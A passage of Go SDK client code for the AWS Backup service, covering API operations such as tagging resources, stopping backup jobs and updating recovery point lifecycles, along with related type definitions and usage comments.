// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the StopBackupJobRequest method.
// req, resp := client.StopBackupJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StopBackupJob
func (c *Backup) StopBackupJobRequest(input *StopBackupJobInput) (req *request.Request, output *StopBackupJobOutput) {
op := &request.Operation{
Name: opStopBackupJob,
HTTPMethod: "POST",
HTTPPath: "/backup-jobs/{backupJobId}",
}
if input == nil {
input = &StopBackupJobInput{}
}
output = &StopBackupJobOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// StopBackupJob API operation for AWS Backup.
//
// Attempts to cancel a job to create a one-time backup of a resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation StopBackupJob for usage and error information.
//
// Returned Error Types:
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/StopBackupJob
func (c *Backup) StopBackupJob(input *StopBackupJobInput) (*StopBackupJobOutput, error) {
req, out := c.StopBackupJobRequest(input)
return out, req.Send()
}
// StopBackupJobWithContext is the same as StopBackupJob with the addition of
// the ability to pass a context and additional request options.
//
// See StopBackupJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) StopBackupJobWithContext(ctx aws.Context, input *StopBackupJobInput, opts ...request.Option) (*StopBackupJobOutput, error) {
req, out := c.StopBackupJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
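// A minimal sketch (illustrative only): attempting to cancel a running backup
// job by its ID. The BackupJobId input field is an assumption about the
// service shapes, not shown above.
//
//    _, err := client.StopBackupJob(&backup.StopBackupJobInput{
//        BackupJobId: aws.String("exampleBackupJobId"),
//    })
//    if err != nil {
//        fmt.Println(err)
//    }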
const opTagResource = "TagResource"
// TagResourceRequest generates a "aws/request.Request" representing the
// client's request for the TagResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See TagResource for more information on using the TagResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the TagResourceRequest method.
// req, resp := client.TagResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/TagResource
func (c *Backup) TagResourceRequest(input *TagResourceInput) (req *request.Request, output *TagResourceOutput) {
op := &request.Operation{
Name: opTagResource,
HTTPMethod: "POST",
HTTPPath: "/tags/{resourceArn}",
}
if input == nil {
input = &TagResourceInput{}
}
output = &TagResourceOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// TagResource API operation for AWS Backup.
//
// Assigns a set of key-value pairs to a recovery point, backup plan, or backup
// vault identified by an Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation TagResource for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/TagResource
func (c *Backup) TagResource(input *TagResourceInput) (*TagResourceOutput, error) {
req, out := c.TagResourceRequest(input)
return out, req.Send()
}
// TagResourceWithContext is the same as TagResource with the addition of
// the ability to pass a context and additional request options.
//
// See TagResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) TagResourceWithContext(ctx aws.Context, input *TagResourceInput, opts ...request.Option) (*TagResourceOutput, error) {
req, out := c.TagResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
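// A minimal sketch (illustrative only): assigning tags to a resource. The
// ResourceArn and Tags input fields are assumptions about the service shapes,
// not shown above.
//
//    _, err := client.TagResource(&backup.TagResourceInput{
//        ResourceArn: aws.String("arn:aws:backup:us-east-1:123456789012:recovery-point:example"),
//        Tags: map[string]*string{
//            "Department": aws.String("accounting"),
//        },
//    })
//    if err != nil {
//        fmt.Println(err)
//    }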
const opUntagResource = "UntagResource"
// UntagResourceRequest generates a "aws/request.Request" representing the
// client's request for the UntagResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UntagResource for more information on using the UntagResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UntagResourceRequest method.
// req, resp := client.UntagResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UntagResource
func (c *Backup) UntagResourceRequest(input *UntagResourceInput) (req *request.Request, output *UntagResourceOutput) {
op := &request.Operation{
Name: opUntagResource,
HTTPMethod: "POST",
HTTPPath: "/untag/{resourceArn}",
}
if input == nil {
input = &UntagResourceInput{}
}
output = &UntagResourceOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// UntagResource API operation for AWS Backup.
//
// Removes a set of key-value pairs from a recovery point, backup plan, or backup
// vault identified by an Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UntagResource for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UntagResource
func (c *Backup) UntagResource(input *UntagResourceInput) (*UntagResourceOutput, error) {
req, out := c.UntagResourceRequest(input)
return out, req.Send()
}
// UntagResourceWithContext is the same as UntagResource with the addition of
// the ability to pass a context and additional request options.
//
// See UntagResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UntagResourceWithContext(ctx aws.Context, input *UntagResourceInput, opts ...request.Option) (*UntagResourceOutput, error) {
req, out := c.UntagResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
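// A minimal sketch (illustrative only): removing tags by key. The ResourceArn
// and TagKeyList input fields are assumptions about the service shapes, not
// shown above.
//
//    _, err := client.UntagResource(&backup.UntagResourceInput{
//        ResourceArn: aws.String("arn:aws:backup:us-east-1:123456789012:recovery-point:example"),
//        TagKeyList:  []*string{aws.String("Department")},
//    })
//    if err != nil {
//        fmt.Println(err)
//    }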
const opUpdateBackupPlan = "UpdateBackupPlan"
// UpdateBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the UpdateBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateBackupPlan for more information on using the UpdateBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateBackupPlanRequest method.
// req, resp := client.UpdateBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateBackupPlan
func (c *Backup) UpdateBackupPlanRequest(input *UpdateBackupPlanInput) (req *request.Request, output *UpdateBackupPlanOutput) {
op := &request.Operation{
Name: opUpdateBackupPlan,
HTTPMethod: "POST",
HTTPPath: "/backup/plans/{backupPlanId}",
}
if input == nil {
input = &UpdateBackupPlanInput{}
}
output = &UpdateBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// UpdateBackupPlan API operation for AWS Backup.
//
// Updates an existing backup plan identified by its backupPlanId with the input
// document in JSON format. The new version is uniquely identified by a VersionId.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateBackupPlan for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateBackupPlan
func (c *Backup) UpdateBackupPlan(input *UpdateBackupPlanInput) (*UpdateBackupPlanOutput, error) {
req, out := c.UpdateBackupPlanRequest(input)
return out, req.Send()
}
// UpdateBackupPlanWithContext is the same as UpdateBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateBackupPlanWithContext(ctx aws.Context, input *UpdateBackupPlanInput, opts ...request.Option) (*UpdateBackupPlanOutput, error) {
req, out := c.UpdateBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUpdateGlobalSettings = "UpdateGlobalSettings"
// UpdateGlobalSettingsRequest generates a "aws/request.Request" representing the
// client's request for the UpdateGlobalSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateGlobalSettings for more information on using the UpdateGlobalSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateGlobalSettingsRequest method.
// req, resp := client.UpdateGlobalSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateGlobalSettings
func (c *Backup) UpdateGlobalSettingsRequest(input *UpdateGlobalSettingsInput) (req *request.Request, output *UpdateGlobalSettingsOutput) {
op := &request.Operation{
Name: opUpdateGlobalSettings,
HTTPMethod: "PUT",
HTTPPath: "/global-settings",
}
if input == nil {
input = &UpdateGlobalSettingsInput{}
}
output = &UpdateGlobalSettingsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// UpdateGlobalSettings API operation for AWS Backup.
//
// Updates the current global settings for the AWS account. Use the DescribeGlobalSettings
// API to determine the current settings.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateGlobalSettings for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateGlobalSettings
func (c *Backup) UpdateGlobalSettings(input *UpdateGlobalSettingsInput) (*UpdateGlobalSettingsOutput, error) {
req, out := c.UpdateGlobalSettingsRequest(input)
return out, req.Send()
}
// UpdateGlobalSettingsWithContext is the same as UpdateGlobalSettings with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateGlobalSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateGlobalSettingsWithContext(ctx aws.Context, input *UpdateGlobalSettingsInput, opts ...request.Option) (*UpdateGlobalSettingsOutput, error) {
req, out := c.UpdateGlobalSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opUpdateRecoveryPointLifecycle = "UpdateRecoveryPointLifecycle"
// UpdateRecoveryPointLifecycleRequest generates a "aws/request.Request" representing the
// client's request for the UpdateRecoveryPointLifecycle operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateRecoveryPointLifecycle for more information on using the UpdateRecoveryPointLifecycle
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateRecoveryPointLifecycleRequest method.
// req, resp := client.UpdateRecoveryPointLifecycleRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRecoveryPointLifecycle
func (c *Backup) UpdateRecoveryPointLifecycleRequest(input *UpdateRecoveryPointLifecycleInput) (req *request.Request, output *UpdateRecoveryPointLifecycleOutput) {
op := &request.Operation{
Name: opUpdateRecoveryPointLifecycle,
HTTPMethod: "POST",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}",
}
if input == nil {
input = &UpdateRecoveryPointLifecycleInput{}
}
output = &UpdateRecoveryPointLifecycleOutput{}
req = c.newRequest(op, input, output)
return
}
// UpdateRecoveryPointLifecycle API operation for AWS Backup.
//
// Sets the transition lifecycle of a recovery point.
//
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
//
// Does not support continuous backups.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateRecoveryPointLifecycle for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRecoveryPointLifecycle
func (c *Backup) UpdateRecoveryPointLifecycle(input *UpdateRecoveryPointLifecycleInput) (*UpdateRecoveryPointLifecycleOutput, error) {
req, out := c.UpdateRecoveryPointLifecycleRequest(input)
return out, req.Send()
}
// UpdateRecoveryPointLifecycleWithContext is the same as UpdateRecoveryPointLifecycle with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateRecoveryPointLifecycle for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateRecoveryPointLifecycleWithContext(ctx aws.Context, input *UpdateRecoveryPointLifecycleInput, opts ...request.Option) (*UpdateRecoveryPointLifecycleOutput, error) {
req, out := c.UpdateRecoveryPointLifecycleRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
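// A minimal sketch (illustrative only): transitioning a recovery point to cold
// storage after 30 days and expiring it after 120 days, which satisfies the
// 90-day minimum described above (120 >= 30 + 90). The input field names and
// the Lifecycle fields MoveToColdStorageAfterDays/DeleteAfterDays are
// assumptions about the service shapes, not shown above.
//
//    _, err := client.UpdateRecoveryPointLifecycle(&backup.UpdateRecoveryPointLifecycleInput{
//        BackupVaultName:  aws.String("aBackupVault"),
//        RecoveryPointArn: aws.String("arn:aws:backup:us-east-1:123456789012:recovery-point:example"),
//        Lifecycle: &backup.Lifecycle{
//            MoveToColdStorageAfterDays: aws.Int64(30),
//            DeleteAfterDays:            aws.Int64(120),
//        },
//    })
//    if err != nil {
//        fmt.Println(err)
//    }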
const opUpdateRegionSettings = "UpdateRegionSettings"
// UpdateRegionSettingsRequest generates a "aws/request.Request" representing the
// client's request for the UpdateRegionSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See UpdateRegionSettings for more information on using the UpdateRegionSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the UpdateRegionSettingsRequest method.
// req, resp := client.UpdateRegionSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRegionSettings
func (c *Backup) UpdateRegionSettingsRequest(input *UpdateRegionSettingsInput) (req *request.Request, output *UpdateRegionSettingsOutput) {
op := &request.Operation{
Name: opUpdateRegionSettings,
HTTPMethod: "PUT",
HTTPPath: "/account-settings",
}
if input == nil {
input = &UpdateRegionSettingsInput{}
}
output = &UpdateRegionSettingsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// UpdateRegionSettings API operation for AWS Backup.
//
// Updates the current service opt-in settings for the Region. If service opt-in
// is enabled for a service, AWS Backup tries to protect that service's resources
// in this Region when the resource is included in an on-demand backup or scheduled
// backup plan. Otherwise, AWS Backup does not try to protect that service's
// resources in this Region. Use the DescribeRegionSettings API to determine
// the resource types that are supported.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation UpdateRegionSettings for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/UpdateRegionSettings
func (c *Backup) UpdateRegionSettings(input *UpdateRegionSettingsInput) (*UpdateRegionSettingsOutput, error) {
req, out := c.UpdateRegionSettingsRequest(input)
return out, req.Send()
}
// UpdateRegionSettingsWithContext is the same as UpdateRegionSettings with the addition of
// the ability to pass a context and additional request options.
//
// See UpdateRegionSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) UpdateRegionSettingsWithContext(ctx aws.Context, input *UpdateRegionSettingsInput, opts ...request.Option) (*UpdateRegionSettingsOutput, error) {
req, out := c.UpdateRegionSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
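// A minimal sketch (illustrative only): opting a resource type in to AWS Backup
// protection in the current Region. The ResourceTypeOptInPreference input
// field is an assumption about the service shapes, not shown above.
//
//    _, err := client.UpdateRegionSettings(&backup.UpdateRegionSettingsInput{
//        ResourceTypeOptInPreference: map[string]*bool{
//            "EFS": aws.Bool(true),
//        },
//    })
//    if err != nil {
//        fmt.Println(err)
//    }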
// A list of backup options for each resource type.
type AdvancedBackupSetting struct {
_ struct{} `type:"structure"`
// Specifies the backup option for a selected resource. This option is only
// available for Windows VSS backup jobs.
//
// Valid values:
//
// Set to "WindowsVSS":"enabled" to enable the WindowsVSS backup option and
// create a VSS Windows backup.
//
// Set to "WindowsVSS":"disabled" to create a regular backup. The WindowsVSS
// option is not enabled by default.
//
// If you specify an invalid option, you get an InvalidParameterValueException.
//
// For more information about Windows VSS backups, see Creating a VSS-Enabled
// Windows Backup (https://docs.aws.amazon.com/aws-backup/latest/devguide/windows-backups.html).
BackupOptions map[string]*string `type:"map"`
// Specifies an object containing resource type and backup options. The only
// supported resource type is Amazon EC2 instances with Windows VSS. For a
// CloudFormation example, see the sample CloudFormation template to enable
// Windows VSS (https://docs.aws.amazon.com/aws-backup/latest/devguide/integrate-cloudformation-with-aws-backup.html)
// in the AWS Backup User Guide.
//
// Valid values: EC2.
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s AdvancedBackupSetting) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s AdvancedBackupSetting) GoString() string {
return s.String()
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *AdvancedBackupSetting) SetBackupOptions(v map[string]*string) *AdvancedBackupSetting {
s.BackupOptions = v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *AdvancedBackupSetting) SetResourceType(v string) *AdvancedBackupSetting {
s.ResourceType = &v
return s
}
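// A minimal sketch using the setters above: enabling Windows VSS for EC2
// backups. The "WindowsVSS":"enabled" key-value pair follows the valid values
// documented on BackupOptions.
//
//    setting := (&backup.AdvancedBackupSetting{}).
//        SetResourceType("EC2").
//        SetBackupOptions(map[string]*string{
//            "WindowsVSS": aws.String("enabled"),
//        })
//    fmt.Println(setting)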
// The required resource already exists.
type AlreadyExistsException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Arn *string `type:"string"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
CreatorRequestId *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s AlreadyExistsException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s AlreadyExistsException) GoString() string {
return s.String()
}
func newErrorAlreadyExistsException(v protocol.ResponseMetadata) error {
return &AlreadyExistsException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *AlreadyExistsException) Code() string {
return "AlreadyExistsException"
}
// Message returns the exception's message.
func (s *AlreadyExistsException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfying the awserr.Error interface.
func (s *AlreadyExistsException) OrigErr() error {
return nil
}
func (s *AlreadyExistsException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *AlreadyExistsException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for the request.
func (s *AlreadyExistsException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains DeleteAt and MoveToColdStorageAt timestamps, which are used to specify
// a lifecycle for a recovery point.
//
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
type CalculatedLifecycle struct {
_ struct{} `type:"structure"`
// A timestamp that specifies when to delete a recovery point.
DeleteAt *time.Time `type:"timestamp"`
// A timestamp that specifies when to transition a recovery point to cold storage.
MoveToColdStorageAt *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s CalculatedLifecycle) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CalculatedLifecycle) GoString() string {
return s.String()
}
// SetDeleteAt sets the DeleteAt field's value.
func (s *CalculatedLifecycle) SetDeleteAt(v time.Time) *CalculatedLifecycle {
s.DeleteAt = &v
return s
}
// SetMoveToColdStorageAt sets the MoveToColdStorageAt field's value.
func (s *CalculatedLifecycle) SetMoveToColdStorageAt(v time.Time) *CalculatedLifecycle {
s.MoveToColdStorageAt = &v
return s
}
// Contains an array of triplets made up of a condition type (such as StringEquals),
// a key, and a value. Conditions are used to filter resources in a selection
// that is assigned to a backup plan.
type Condition struct {
_ struct{} `type:"structure"`
// The key in a key-value pair. For example, in "ec2:ResourceTag/Department":
// "accounting", "ec2:ResourceTag/Department" is the key.
//
// ConditionKey is a required field
ConditionKey *string `type:"string" required:"true"`
// An operation, such as StringEquals, that is applied to a key-value pair used
// to filter resources in a selection.
//
// ConditionType is a required field
ConditionType *string `type:"string" required:"true" enum:"ConditionType"`
// The value in a key-value pair. For example, in "ec2:ResourceTag/Department":
// "accounting", "accounting" is the value.
//
// ConditionValue is a required field
ConditionValue *string `type:"string" required:"true"`
}
// String returns the string representation
func (s Condition) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Condition) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *Condition) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "Condition"}
if s.ConditionKey == nil {
invalidParams.Add(request.NewErrParamRequired("ConditionKey"))
}
if s.ConditionType == nil {
invalidParams.Add(request.NewErrParamRequired("ConditionType"))
}
if s.ConditionValue == nil {
invalidParams.Add(request.NewErrParamRequired("ConditionValue"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetConditionKey sets the ConditionKey field's value.
func (s *Condition) SetConditionKey(v string) *Condition {
s.ConditionKey = &v
return s
}
// SetConditionType sets the ConditionType field's value.
func (s *Condition) SetConditionType(v string) *Condition {
s.ConditionType = &v
return s
}
// SetConditionValue sets the ConditionValue field's value.
func (s *Condition) SetConditionValue(v string) *Condition {
s.ConditionValue = &v
return s
}
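// exampleTagCondition is an illustrative sketch, not part of the generated
// API: it builds the StringEquals condition from the field documentation
// above, selecting resources tagged "Department: accounting", and returns the
// result of Validate, which passes once all three required fields are set.
func exampleTagCondition() (*Condition, error) {
	cond := (&Condition{}).
		SetConditionType("StringEquals").
		SetConditionKey("ec2:ResourceTag/Department").
		SetConditionValue("accounting")
	return cond, cond.Validate()
}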
// The details of the copy operation.
type CopyAction struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies the destination backup
// vault for the copied backup. For example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
//
// DestinationBackupVaultArn is a required field
DestinationBackupVaultArn *string `type:"string" required:"true"`
// Contains an array of Transition objects specifying how long in days before
// a recovery point transitions to cold storage or is deleted.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, on the console, the “expire after days”
// setting must be 90 days greater than the “transition to cold after days”
// setting. The “transition to cold after days” setting cannot be changed
// after a backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
}
// String returns the string representation
func (s CopyAction) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CopyAction) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CopyAction) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CopyAction"}
if s.DestinationBackupVaultArn == nil {
invalidParams.Add(request.NewErrParamRequired("DestinationBackupVaultArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetDestinationBackupVaultArn sets the DestinationBackupVaultArn field's value.
func (s *CopyAction) SetDestinationBackupVaultArn(v string) *CopyAction {
s.DestinationBackupVaultArn = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *CopyAction) SetLifecycle(v *Lifecycle) *CopyAction {
s.Lifecycle = v
return s
}
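// exampleCopyAction is an illustrative sketch, not part of the generated API.
// The destination vault ARN comes from the documentation above; the Lifecycle
// values are hypothetical and assume the SetMoveToColdStorageAfterDays and
// SetDeleteAfterDays setters that Lifecycle defines elsewhere in this package.
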